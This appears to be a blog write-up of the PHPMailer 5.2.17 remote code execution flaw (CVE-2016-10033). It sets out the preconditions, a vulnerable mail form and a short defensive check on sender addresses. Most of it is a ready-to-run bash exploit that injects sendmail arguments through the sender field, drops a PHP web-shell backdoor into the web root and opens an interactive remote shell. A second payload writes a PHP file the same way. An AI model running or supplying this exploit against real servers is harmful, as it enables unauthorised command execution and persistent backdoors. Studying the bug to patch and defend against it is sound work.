
PHPMailer 5.2.17 – Remote Code Execution

Frankly, once I saw the preconditions I lost interest, and I was even late for work over it. I just hadn't read the conditions carefully. It would have been so much better if I could have run it straight from Docker.
Before this commit in class.phpmailer.php, in a certain scenario there is no filtering of special characters in the sender's email address. This flaw can lead to remote code execution via the mail function here.

To trigger this code, you need:

* PHPMailer < 5.2.18
* PHP compiled without PCRE.
* PHP version lower than 5.2.0.

So you can bypass the sender's email validation in the validateAddress function by setting patternselect to noregex. To make it easier to reach such an environment without having to set up PHP that way, I simply hardcoded it in this code.
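An added illustration, not from the original post or from PHPMailer itself, of why the noregex fallback accepts the sender addresses used on this page and what a stricter sender check looks like. noregexValidate re-implements (from memory, so treat it as an approximation) the rudimentary "@ is neither first nor last" test that branch performs; senderIsSafe is a hypothetical helper, not a PHPMailer API.

```php
<?php
// Re-implementation of the rudimentary check PHPMailer falls back to
// when PCRE is unavailable: any string with an '@' that is neither the
// first nor the last character passes. (Approximation, not the library's code.)
function noregexValidate(string $address): bool
{
    $at = strpos($address, '@');
    return strlen($address) >= 3 && $at !== false && $at >= 1 && $at != strlen($address) - 1;
}

// Stricter gate for anything that ends up in sendmail's -f parameter
// (hypothetical helper): reject whitespace and shell metacharacters
// outright, then require a syntactically valid mailbox.
function senderIsSafe(string $address): bool
{
    if (preg_match('/[\s"\'`\\\\()<>|;&$]/', $address)) {
        return false;
    }
    return filter_var($address, FILTER_VALIDATE_EMAIL) !== false;
}

// Constructed sample set: one benign address and the two injected sender
// addresses quoted on this page.
$samples = [
    'user@example.com',
    'vulnerables@ -OQueueDirectory=/tmp -X/www/backdoor.php',
    'aaa( -X/home/www/success.php )@qq.com',
];
foreach ($samples as $s) {
    printf("%-58s noregex=%s safe=%s\n", $s,
        noregexValidate($s) ? 'accept' : 'reject',
        senderIsSafe($s) ? 'accept' : 'reject');
}
```

The noregex column accepts all three addresses, which is the gap described above; the stricter check accepts only the benign one.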
The author debugged this locally:

python -m smtpd -n -c DebuggingServer localhost:25

Code to test the vulnerability:

<html>
<head>
    <title>Vulnerable Mail Form</title>
</head>
<body>
    <h1> Vulnerable mail form </h1>
    <form action="" method="POST" enctype="multipart/form-data">
        <input type="hidden" name="action" value="submit">
        Your name:<br>
        <input name="name" type="text" value="" size="30"/><br>
        Your email:<br>
        <input name="email" type="text" value="" size="30"/><br>
        Your message:<br>
        <textarea name="message" rows="7" cols="30"></textarea><br>
        <input type="submit" value="Send email"/>
    </form>
    <pre>
<?php
$action=$_REQUEST['action'];
if ($action!=""){
    $name=$_REQUEST['name'];
    $email=$_REQUEST['email'];
    $message=$_REQUEST['message'];
    if (($name=="")||($email=="")||($message=="")){
        echo "There are missing fields.";
    }else{
        require 'vulnerable/PHPMailerAutoload.php';
        $mail = new PHPMailer;
        $mail->Host = "localhost";
        $mail->setFrom($email, 'Vulnerable Server');
        $mail->addAddress('admin@vulnerable.com', 'Hacker');
        $mail->Subject  = "Message from $name";
        $mail->Body     = $message;
        if(!$mail->send()) {
            echo 'Message was not sent.';
            echo 'Mailer error: ' . $mail->ErrorInfo;
        } else {
            echo 'Message has been sent.';
        }
    }
}
?>
    </pre>
</body>
</html>

Exploit code:

#!/bin/bash
# CVE-2016-10033 exploit by opsxcq
# https://github.com/opsxcq/exploit-CVE-2016-10033

echo '[+] CVE-2016-10033 exploit by opsxcq'

if [ -z "$1" ]
then
    echo '[-] Please inform an host as parameter'
    exit -1
fi

host=$1

echo '[+] Exploiting '$host

curl -sq 'http://'$host -H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzXJpHSq4mNy35tHe' --data-binary $'------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="action"\r\n\r\nsubmit\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="name"\r\n\r\n<?php echo "|".base64_encode(system(base64_decode($_GET["cmd"])))."|"; ?>\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="email"\r\n\r\nvulnerables@ -OQueueDirectory=/tmp -X/www/backdoor.php\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="message"\r\n\r\nPwned\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe--\r\n' >/dev/null && echo '[+] Target exploited, acessing shell at http://'$host'/backdoor.php'

cmd='whoami'
while [ "$cmd" != 'exit' ]
do
    echo '[+] Running '$cmd
    curl -sq http://$host/backdoor.php?cmd=$(echo -ne $cmd | base64) | grep '|' | head -n 1 | cut -d '|' -f 2 | base64 -d
    echo
    read -p 'RemoteShell> ' cmd
done
echo '[+] Exiting'

After exploitation, a file called backdoor.php will be stored in the root folder of the web directory, and the exploit will drop you into a shell from which you can send commands to the backdoor:


./exploit.sh localhost:8080
[+] CVE-2016-10033 exploit by opsxcq
[+] Exploiting localhost:8080
[+] Target exploited, acessing shell at http://localhost:8080/backdoor.php
[+] Running whoami
www-data

Update: a payload from phithon

<?php
require 'PHPMailer/PHPMailerAutoload.php';

function send($from) {
    $mail = new PHPMailer;

    $mail->setFrom($from);
    $mail->addAddress('joe@example.net', 'Joe User');     // Add a recipient

    $mail->isHTML(true);                                  // Set email format to HTML

    $mail->Subject = '<?php phpinfo(); ?>';
    $mail->Body    = 'This is the HTML message body <b>in bold!</b>';
    $mail->AltBody = 'This is the body in plain text for non-HTML mail clients';

    if(!$mail->send()) {
        echo 'Message could not be sent.';
        echo 'Mailer Error: ' . $mail->ErrorInfo;
    } else {
        echo 'Message has been sent' . "\n";
    }

    unset($mail);
}

$address = "aaa( -X/home/www/success.php )@qq.com";

send($address);

Execution result (screenshot not reproduced).

Reproduction prohibited without permission: 杂术馆 » PHPMailer 5.2.17 – Remote Code Execution